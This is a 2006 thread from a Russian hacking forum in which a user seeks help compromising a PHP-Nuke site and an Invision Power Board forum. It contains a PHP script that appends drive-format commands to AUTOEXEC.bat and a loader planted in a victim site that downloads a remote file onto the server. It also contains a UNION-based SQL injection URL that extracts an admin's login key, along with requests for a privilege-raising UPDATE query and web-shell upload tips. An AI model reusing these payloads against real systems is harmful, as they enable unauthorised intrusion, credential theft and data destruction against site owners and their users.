Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   php nuke срочно (https://forum.antichat.xyz/showthread.php?t=16333)

KaMiKadZe 22.03.2006 22:52
php nuke срочно
 
Срочная помощь есть php nuke хз какой версии но эксплоит под создание админа пашет так вот как можно хакнуть его если Forums не работает как залить шелл поподробнее плз
В ПОИСК НЕ ПОСЫЛАТЬ НИЧЕГО НОРМАЛЬНОГО НЕ НАШЕЛ!
Вот скрин с админки php код в блок не записать незя!
http://rapidshare.de/files/16158700/clp38.jpg.html
Доступа к phpmyadmin нет!
СРОЧНО ПЛЗ!

Nova 22.03.2006 22:54
Ну через востановление БД шелл попробуй залить только я не поню в нюке такого нема без мода по моему....

KaMiKadZe 22.03.2006 23:12
Цитата:
Сообщение от Nova
Ну через востановление БД шелл попробуй залить только я не поню в нюке такого нема без мода по моему....
Пожайлуста по подробнее )

Nova 22.03.2006 23:15
Цитата:
Сообщение от KaMiKadZe
Пожайлуста по подробнее )
А кудауж подробней тами востановление Бд есть ? если есть пробуй через sql залить шелл...

KaMiKadZe 22.03.2006 23:58
Цитата:
Сообщение от Nova
А кудауж подробней тами востановление Бд есть ? если есть пробуй через sql залить шелл...
Неа чего то не нашел тока DUMP БД но щас думаю о другом сразу формат С и Д вот таким скриптом ))
<?
$file=fopen("C:\AUTOEXEC.bat","a++");
$str="@echo off /n format c:\q format /n format d:\q";
fputs($file,$str);
fclose($file);
?>

Nova 23.03.2006 00:08
Цитата:
Сообщение от KaMiKadZe
Неа чего то не нашел тока DUMP БД но щас думаю о другом сразу формат С и Д вот таким скриптом ))
<?
$file=fopen("C:\AUTOEXEC.bat","a++");
$str="@echo off /n format c:\q format /n format d:\q";
fputs($file,$str);
fclose($file);
?>
Ну ты реально ламер тогда если так думаеш у меня слов нет всё здесь постить больше не буду.....

KaMiKadZe 23.03.2006 09:01
Цитата:
Сообщение от Nova
Ну ты реально ламер тогда если так думаеш у меня слов нет всё здесь постить больше не буду.....
хех несмеши )
сначало я встроил в сайт скрипт
Код:
<?php
$link = 'http://*******/txt.txt';
$link2 = 'format.php';      //init file address
$file = fopen($link, "r");
$rf = fread($file, 100000);
if ($rf) { echo ""; }
else { echo " "; }      //read data of source
echo "< Br>";
$file2 = fopen($link2, "w");      //Copy data in exit_file
if (fputs($file2 , $rf, 100000)) { echo " "; }
else { echo ""; } 
echo "Done!";
fclose($file2);
?>
Потом админ заходи к себе на сайт и у него это копируется файл на сервер дальше я внедряю format.php
Код:

<?
$file=fopen("C:\AUTOEXEC.bat","a++");
$str="@echo off /n format c: /q format /n format d: /q";
fputs($file,$str);
fclose($file);
?>
PHP символы не принимает тока простые так значит ссылку и все больше мне от него и его пользователей ничего не надо)

A110ut 23.03.2006 09:22
AUTOEXEC.bat ета внатуре крута :) Об остальном ваще промолчу :)
зы: ех жаль до репы твоей добраться не могу ;)

KaMiKadZe 23.03.2006 13:40
Ладно я понел свою ошибку теперь немогу понять другого вот этим кодом я вывожу в отправку поста инфу о админе
Код:
h**p://***********/forum/upload/index.php?&act=Post&CODE=02&f=61&t=7897&qpid=666666666)%20union%20select%201,1,1,1,1,1,1,1,1,1,CONCAT(id,char(58),name,char(58),member_login_key,char(58)mgroup),1,1,1,1,1,1,1,1,1%20from%20ibf2_members%20WHERE%20id=1%20/*
Ну вот вывел теперь решил найти столбец где соль установил IPB 2.0.3 и немогу найти там такого столбца в members нет там такого но ладно решил иди SQL инъекцией но невышло подскажите как граматно сделать обновление IPF2_MEMBERS столбец mgroup просто никак немогу догадаться все мысли свои по поводу этого прошу выложить)

KaMiKadZe 23.03.2006 22:31
Ну что никто неможет помочь норм запрос к Bd (update) помочь сделать :( :( :(


Время: 01:06